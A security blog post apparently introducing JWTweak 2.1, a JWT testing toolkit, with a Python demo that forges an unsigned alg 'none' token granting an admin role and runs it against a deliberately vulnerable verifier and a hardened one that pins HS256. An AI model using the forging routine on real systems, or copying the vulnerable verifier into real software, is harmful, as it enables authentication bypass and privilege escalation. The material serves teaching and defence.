Introduction

JSON Web Tokens sit at the heart of modern authentication, and because the token is held and presented by the client, a single weak check on the server side can hand an attacker an admin account. JWTweak was built to test for exactly these flaws. It started as a small utility to switch a token's algorithm and re-issue it in seconds, helping security enthusiasts hunt for issues such as the JWT algorithm confusion attack. Version 2.1 is a complete rewrite into a guided, menu-driven toolkit: you paste a token, it decodes and risk-analyses it, recommends the attacks that fit, and walks you through each one, entirely offline and with no flags to memorise. In this post we'll tour the tool and then break into a deliberately vulnerable app with two live proof-of-concept attacks.
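The "switch the algorithm and re-issue" move the introduction describes is easiest to understand against a verifier that does and one that does not dispatch on the token's own alg header. The following is an added example written for this page, not JWTweak's code: it issues an HS256 token with a constructed demo secret, forges an alg "none" variant with an upgraded role, and runs both tokens through a vulnerable verifier (trusts the header's alg) and a hardened one (pins HS256 server-side). The secret, claims and helper names are all assumptions for the demo; only the standard library is used.

```python
import base64
import hashlib
import hmac
import json

# Constructed demo secret for this example; a real server loads it from a secrets store.
SECRET = b"demo-hmac-secret-not-for-production"


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(segment: str) -> bytes:
    # JWT segments drop '=' padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def encode_segment(obj: dict) -> str:
    return b64url_encode(json.dumps(obj, separators=(",", ":")).encode())


def issue_hs256(claims: dict, secret: bytes) -> str:
    """What a legitimate server does: HMAC-SHA256 over header.payload."""
    signing_input = encode_segment({"alg": "HS256", "typ": "JWT"}) + "." + encode_segment(claims)
    sig = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def decode_unverified(token: str) -> tuple:
    """Decode header and payload without checking the signature (what an attacker does first)."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    return json.loads(b64url_decode(header_b64)), json.loads(b64url_decode(payload_b64)), sig_b64


def forge_alg_none(token: str, changes: dict) -> str:
    """Attacker move: rewrite claims, switch alg to 'none', drop the signature entirely."""
    header, payload, _ = decode_unverified(token)
    header["alg"] = "none"
    payload.update(changes)
    return encode_segment(header) + "." + encode_segment(payload) + "."


def verify_vulnerable(token: str, secret: bytes):
    """Dispatches on whatever alg the (attacker-controlled) header announces."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    alg = json.loads(b64url_decode(header_b64)).get("alg")
    if str(alg).lower() == "none":            # accepts unsigned tokens
        return json.loads(b64url_decode(payload_b64))
    if alg == "HS256":
        expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(sig_b64)):
            return json.loads(b64url_decode(payload_b64))
    return None


def verify_hardened(token: str, secret: bytes):
    """Pins the algorithm server-side; the header's alg is checked, never used for dispatch."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    if json.loads(b64url_decode(header_b64)).get("alg") != "HS256":
        return None                            # 'none', 'None', RS256, anything else: reject
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig_b64)):
        return None
    return json.loads(b64url_decode(payload_b64))


if __name__ == "__main__":
    legit = issue_hs256({"sub": "alice", "role": "user"}, SECRET)
    forged = forge_alg_none(legit, {"role": "admin"})
    print("forged token:", forged)
    print("vulnerable verifier:", verify_vulnerable(forged, SECRET))
    print("hardened verifier:  ", verify_hardened(forged, SECRET))
```

The hardened verifier's first check is the one that matters: the expected algorithm is a server-side constant, so the alg header can only confirm or fail it, never select the code path. The same pinning defeats the RS256-to-HS256 confusion variant, where the attacker's HS256 signature is computed with the server's public key as the HMAC secret; that variant needs an RSA key pair and is not reproduced in this stand-alone demo.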
Securethy: Attack Scenarios & Audit Guides
Educational purpose: case studies, attack scenarios and audit guidelines on vulnerabilities, AI powered.